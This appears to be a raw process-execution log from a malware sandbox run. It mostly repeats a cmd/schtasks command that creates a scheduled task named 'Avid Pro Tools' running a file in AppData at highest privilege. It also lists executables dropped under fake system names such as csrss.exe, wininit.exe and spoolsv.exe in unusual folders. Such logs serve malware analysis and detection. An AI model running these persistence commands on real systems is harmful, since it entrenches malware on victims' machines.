SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\spoolsv.exe

C:\winNet\spoolsv.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\eHome\wininit.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\winNet\Bloxstrap.exe

C:\winNet\Bloxstrap.exe

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Offline Web Pages\Refcrt.exe

"C:\Windows\Offline Web Pages\Refcrt.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Offline Web Pages\Refcrt.exe.exe

"C:\Windows\Offline Web Pages\Refcrt.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\Bloxstrap.exe.exe

"C:\winNet\Bloxstrap.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\All Users\Microsoft\eHome\wininit.exe.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\Idle.exe

C:\winNet\Idle.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\Program Files\Windows Defender\es-ES\cmd.exe

"C:\Program Files\Windows Defender\es-ES\cmd.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

